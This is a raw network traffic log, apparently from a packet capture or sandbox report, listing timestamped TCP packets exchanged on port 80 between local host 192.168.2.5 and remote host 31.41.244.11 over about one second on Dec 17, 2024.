Dec 17, 2024 06:03:40.804811001 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.805298090 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.805783033 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.805835962 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.806247950 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.806299925 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.806418896 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.806469917 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.807347059 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.807398081 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.807400942 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.807441950 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.808022976 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.808176994 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.808226109 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.809082985 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.809124947 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.809200048 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.809243917 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.810084105 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.810132027 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.810209036 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.810256004 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.811212063 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.811258078 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.811342001 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.811386108 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.812335968 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.812371016 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.812416077 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.813348055 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.813393116 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.813503981 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.813590050 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.814403057 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.814438105 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.814450979 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.814475060 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.815623045 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.815673113 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.815803051 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.815846920 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.816528082 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.816560984 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.816606998 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.817261934 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.817317009 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.817380905 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.817434072 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.819722891 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.819756985 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.819775105 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.819794893 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.820900917 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.820935011 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.820986032 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.821039915 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.821074963 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.821075916 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.821926117 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.821959019 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.821981907 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.822010994 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.823029995 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.823064089 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.823082924 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.823106050 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.823971033 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.824004889 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.824055910 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.824687004 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.824863911 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.824872017 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.824918032 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.825774908 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.825831890 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.825874090 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.825923920 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.826878071 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.826931000 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.826952934 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.827004910 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.827878952 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.828017950 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.828073978 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.828955889 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.829009056 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.829086065 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.829137087 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.830019951 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.830070972 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.830126047 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.830174923 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.831044912 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.831093073 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.831167936 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.831213951 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.832247019 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.832281113 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.832334995 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.833226919 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.833280087 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.833342075 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.833395004 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.836721897 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.836772919 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.836807013 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.836828947 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.836841106 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.836857080 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.836875916 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.836885929 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.836910009 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.836919069 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.836949110 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.837438107 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.837486029 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.837511063 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.837558031 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.838541031 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.838574886 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.838588953 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.838651896 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.839648962 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.839682102 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.839696884 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.839728117 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.840634108 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.840717077 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.840771914 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.841779947 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.841814041 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.841833115 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.841856003 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.842837095 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.842870951 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.842886925 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.842911959 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.843879938 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.844186068 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.844239950 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.844969988 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.845004082 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.845021963 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.845048904 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.845971107 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.846020937 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.846023083 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.846070051 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.847091913 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.847126007 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.847146034 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.847166061 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.848102093 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.848155975 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.848155975 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.848205090 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.849087954 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.849139929 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.849261045 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.849315882 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.850153923 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.850204945 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.850326061 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.850373983 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.851355076 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.851388931 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.851406097 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.851437092 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.852368116 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.852400064 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.852447987 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.853782892 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.853836060 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.990370035 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.990459919 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.990670919 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.990710020 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.991003990 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.991133928 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.991221905 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.991769075 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.991806984 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.991862059 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.992780924 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.992944002 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.992995024 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.993676901 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.993722916 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.993884087 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.993927002 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.994851112 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.994862080 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.994889021 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.994899988 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.995938063 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.996057034 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.996094942 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.996138096 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.996965885 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.997047901 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.997119904 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.997163057 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.998030901 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.998074055 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.998177052 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.998220921 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.998831034 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.998893023 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.998970985 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.999061108 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.999857903 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.999948025 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.000003099 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.000924110 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.000982046 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.001041889 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.001081944 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.004148006 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.004208088 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.004210949 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.004245996 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.004260063 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.004278898 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.004297972 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.004312038 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.004313946 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.004347086 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.004352093 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.004389048 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.005196095 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.005244970 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.005922079 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.005971909 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.006603956 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.006654024 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.006922960 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.007544041 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.007597923 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.007627964 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.007673979 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.008414030 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.008466959 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.008519888 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.009881973 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.009917974 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.009936094 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.009960890 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.010529995 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.010586023 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.011167049 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.011214018 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.011893988 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.011929035 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.011959076 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.011976957 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.012638092 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.012674093 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.012687922 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.012720108 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.013658047 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.013729095 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.013772011 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.013816118 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.014683962 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.014813900 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.014831066 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.014858007 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.015794992 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.015866995 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.015866995 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.015973091 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.016810894 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.016999960 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.017046928 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.017877102 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.017921925 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.018016100 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.018058062 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.018979073 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.019022942 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.019057989 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.019098997 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.020111084 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.020134926 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.020154953 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.020160913 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.021379948 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.021397114 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.021428108 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.021449089 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.022272110 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.022290945 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.022314072 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.022329092 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.023289919 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.023319960 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.023365021 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.025446892 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.025468111 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.025489092 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.025510073 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.025535107 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.025556087 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.028722048 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.028742075 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.028781891 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.028837919 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.028866053 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.028884888 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.028903008 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.028907061 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.028919935 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.028928995 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.028935909 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.028964043 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.029953003 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.029997110 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.030095100 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.030148029 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.031060934 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.031101942 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.031202078 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.031852961 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.032047987 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.032087088 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.032188892 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.032227039 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.033097029 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.033124924 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.033139944 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.033155918 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.034104109 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.034147978 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.034254074 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.034291029 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.035259962 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.035286903 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.035306931 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.035326004 CET	49902	80	192.168.2.5	31.41.244.11
